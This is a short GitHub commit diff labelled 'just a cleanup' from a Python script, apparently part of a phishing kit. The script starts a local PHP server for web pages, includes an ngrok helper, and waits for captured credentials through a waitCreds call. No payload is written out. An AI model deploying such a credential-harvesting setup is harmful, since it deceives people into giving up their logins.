just a cleanup

This commit is contained in:
Usama Abdul Sattar 2018-09-23 13:58:15 +05:00 committed by GitHub
parent bd2a17dafb
commit 72a8cb16ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -321,11 +321,6 @@ def runNgrok():
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
if __name__ == "__main__":
try:
runPEnv()
@ -344,12 +339,6 @@ if __name__ == "__main__":
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
if didBackground:
logFile.close()